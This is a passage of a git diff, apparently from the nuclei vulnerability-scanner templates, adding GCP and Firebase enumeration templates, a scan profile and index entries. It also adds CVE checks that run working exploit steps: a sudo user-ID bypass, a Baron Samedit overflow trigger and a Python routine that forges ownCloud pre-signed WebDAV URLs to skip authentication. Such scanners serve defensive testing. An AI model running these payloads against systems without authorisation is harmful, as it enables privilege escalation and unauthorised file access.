redirects: false + + attack: batteringram + threads: 10 + + matchers: + - type: status + name: "Available Azure Website" + status: + - 200 + - 302 + condition: or +# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml new file mode 100644 index 0000000000..25da290f22 --- /dev/null +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -0,0 +1,42 @@ +id: gcp-app-engine-enum + +info: + name: GCP App Engine (Appspot) - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for App Engine Apps in GCP. + metadata: + verified: true + tags: cloud,cloud-enum,gcp + +self-contained: true + +variables: + BaseDNS: "appspot.com" + loginRedirect: "accounts.google.com" + +http: + - raw: + - | + GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers: + - type: dsl + name: "Open GCP App Engine App" + dsl: + - "status_code==200" + + - type: dsl + name: "Protected GCP App Engine App" + dsl: + - "status_code==302" + - contains(location, "login") + condition: and +# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml new file mode 100644 index 0000000000..6889edcaad --- /dev/null +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -0,0 +1,39 @@ +id: gcp-bucket-enum + +info: + name: GCP Buckets - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for open and protected buckets in GCP. + metadata: + verified: true + tags: cloud,cloud-enum,gcp + +self-contained: true + +variables: + BaseDNS: "storage.googleapis.com" + +http: + - raw: + - | + GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers: + - type: status + name: "Open GCP Bucket" + status: + - 200 + + - type: status + name: "Protected GCP Bucket" + status: + - 403 +# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml new file mode 100644 index 0000000000..45a6277ff7 --- /dev/null +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -0,0 +1,34 @@ +id: gcp-firebase-app-enum + +info: + name: GCP Firebase Apps - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for Firebase Apps in GCP. + metadata: + verified: true + tags: cloud,cloud-enum,gcp + +self-contained: true + +variables: + BaseDNS: "firebaseapp.com" + +http: + - raw: + - | + GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers: + - type: status + name: "Open GCP Firebase App" + status: + - 200 +# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml new file mode 100644 index 0000000000..27a2ee646e --- /dev/null +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -0,0 +1,50 @@ +id: gcp-firebase-rtdb-enum + +info: + name: GCP Firebase Realtime Database - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for Firebase Realtime Databases in GCP. + metadata: + verified: true + tags: cloud,cloud-enum,gcp + +self-contained: true + +variables: + BaseDNS: "firebaseio.com" + +http: + - raw: + - | + GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers-condition: or + matchers: + - type: status + name: "Open GCP Firebase RTDB" + status: + - 200 + + - type: status + name: "Protected GCP Firebase RTDB" + status: + - 401 + + - type: status + name: "Payment GCP on Google Firebase RTDB" + status: + - 402 + + - type: status + name: "Deactivated GCP Firebase RTDB" + status: + - 423 +# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml new file mode 100644 index 0000000000..b4c4db720d --- /dev/null +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-14287 + +info: + name: Sudo <= 1.8.27 - Security Bypass + author: daffainfo + severity: high + description: | + In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 + - https://www.exploit-db.com/exploits/47502 + metadata: + verified: true + max-request: 2 + vendor: canonical + product: ubuntu_linux + tags: cve,cve2019,sudo,code,linux,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + sudo -u#-1 whoami + + matchers: + - type: dsl + dsl: + - '!contains(code_1_response, "root")' + - 'contains(code_2_response, "root")' + condition: and +# digest: 4b0a004830460221009a6464ce800ea5ccd047c283f312c0742d1000b41b1fc9ab9405dbb1e732f546022100e8c25b8a624190544f16221aab038c76af13d15cf331598437e9fe53a3353c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml new file mode 100644 index 0000000000..4040f0dc15 --- /dev/null +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-3156 + +info: + name: Sudo Baron Samedit - Local Privilege Escalation + author: pussycat0x + severity: high + description: | + Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. + reference: + - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435 + - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit + - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff + metadata: + verified: true + tags: cve,cve2021,sudo,code,linux,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + sudoedit -s '\' $(python3 -c 'print("A"*1000)') + + matchers: + - type: word + words: + - "malloc(): memory corruption" + - "Aborted (core dumped)" + condition: and +# digest: 490a004630440220403cc295d817a1432233bcdffd5874db501002624cbd50c1002bfc06e3ae86bb022007b2f6d4f86e3fab7f53cb5c73eacd4ab22b91801f6ba5109885d3b9a294220a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml new file mode 100644 index 0000000000..4cdc94f210 --- /dev/null +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -0,0 +1,89 @@ +id: CVE-2023-49105 + +info: + name: OwnCloud - WebDAV API Authentication Bypass + author: ChristianPoeschl,FlorianDewald,usdAG + severity: critical + description: | + An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0. + reference: + - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/ + - https://github.com/0xfed/ownedcloud + - https://owncloud.org/security + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-49105 + cwe-id: CWE-287 + epss-score: 0.00091 + epss-percentile: 0.38353 + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: owncloud + product: owncloud + shodan-query: title:"owncloud" + tags: cve,cve2023,owncloud,code,auth-bypass + +variables: + username: admin + +code: + - engine: + - py + - python3 # requires python to be pre-installed on system running nuclei + source: | + # build signature for presigned urls + import base64, hashlib, datetime, os + from urllib.parse import urlencode + + username = os.getenv('username') + base_url = os.getenv('BaseURL') + dav_url = f'{base_url}/remote.php/dav/files/{username}' + oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ') + data = { + 'OC-Expires': '991200', + 'OC-Verb': 'PROPFIND', + 'OC-Credential': username, + 'OC-Date': oc_date + } + sig_url = f'{dav_url}?{urlencode(data)}' + # derive signature from empty sign key + dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32) + final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}' + #final_url = f'{sig_url}&OC-Signature={dk.hex()}' + print(final_url) + +http: + - raw: + - | + PROPFIND {{code_response}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Authorization: Basic {{base64('{{username}}')}} + + matchers-condition: or + matchers: + - type: dsl + name: bypass-correct-user + dsl: + - status_code == 207 + - contains(body, 'owncloud.org') + condition: and + + - type: word + name: bypass-wrong-user + part: body + words: + - User unknown + - Sabre + - Exception + - NotAuthenticated + condition: and + + extractors: + - type: dsl + dsl: + - '"Username => "+ username' +# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml new file mode 100644 index 0000000000..fe6d673451 --- /dev/null +++ b/config/recommended.yml @@ -0,0 +1,88 @@ +# This is a configuration file for the recommended template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/recommended.yml -list target_list_to_scan.txt + +exclude-severity: + - info + +exclude-tags: + - tech + - dos + - fuzz + - creds-stuffing + - token-spray + +exclude-protocols: + - ssl + - dns + - file + - code + - whois + - headless + - workflow + +exclude-id: + - CVE-2021-45967 + - CVE-2021-36380 + - CVE-2021-33544 + - CVE-2021-32305 + - CVE-2021-31755 + - CVE-2021-28164 + - CVE-2021-27931 + - CVE-2021-26855 + - CVE-2021-25052 + - CVE-2021-1498 + - CVE-2020-7796 + - CVE-2020-5775 + - CVE-2020-35713 + - CVE-2020-26919 + - CVE-2020-25223 + - CVE-2020-24148 + - CVE-2020-10770 + - CVE-2019-9978 + - CVE-2019-8451 + - CVE-2019-3929 + - CVE-2019-2767 + - CVE-2019-2616 + - CVE-2019-20224 + - CVE-2019-19824 + - CVE-2019-10758 + - CVE-2018-16167 + - CVE-2018-15517 + - CVE-2018-1000600 + - CVE-2017-9506 + - CVE-2017-3506 + - CVE-2017-18638 + - CVE-2016-1555 + - CVE-2015-8813 + - CVE-2014-3206 + - CVE-2009-4223 + - CNVD-2021-09650 + - generic-tokens + - credentials-disclosure + - targa-camera-ssrf + - cloudflare-external-image-resize + - linkerd-ssrf-detection + - ssrf-via-oauth-misconfig + - tls-sni-proxy + - xmlrpc-pingback-ssrf + - hashicorp-consul-rce + - mirai-unknown-rce + - optilink-ont1gew-gpon-rce + - sar2html-rce + - zimbra-preauth-ssrf + - wp-under-construction-ssrf + - wp-xmlrpc-pingback-detection + - fastjson-1-2-41-rce + - fastjson-1-2-42-rce + - fastjson-1-2-43-rce + - fastjson-1-2-62-rce + - fastjson-1-2-67-rce + - fastjson-1-2-68-rce + - request-based-interaction + - open-proxy-internal + - open-proxy-localhost + - open-proxy-portscan diff --git a/cves.json b/cves.json index 0a490d0d63..5e55ba2563 100644 --- a/cves.json +++ b/cves.json @@ -223,7 +223,7 @@ {"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"} {"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"} {"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"} -{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"} +{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"} {"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"} {"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"} {"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"} @@ -271,6 +271,7 @@ {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} +{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} @@ -624,6 +625,7 @@ {"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"} {"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"} {"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"} +{"ID":"CVE-2018-8823","Info":{"Name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","Severity":"critical","Description":"The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-8823.yaml"} {"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"} {"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"} {"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"} @@ -1088,7 +1090,7 @@ {"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22005.yaml"} {"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-22053.yaml"} {"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-22054.yaml"} -{"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross-Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"} +{"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"} {"ID":"CVE-2021-22145","Info":{"Name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","Severity":"medium","Description":"ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-22145.yaml"} {"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"} {"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"} @@ -1257,6 +1259,7 @@ {"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"} {"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"} {"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"} +{"ID":"CVE-2021-29200","Info":{"Name":"Apache OFBiz \u003c 17.12.07 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29200.yaml"} {"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"} {"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"} {"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"} @@ -1344,7 +1347,7 @@ {"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} {"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 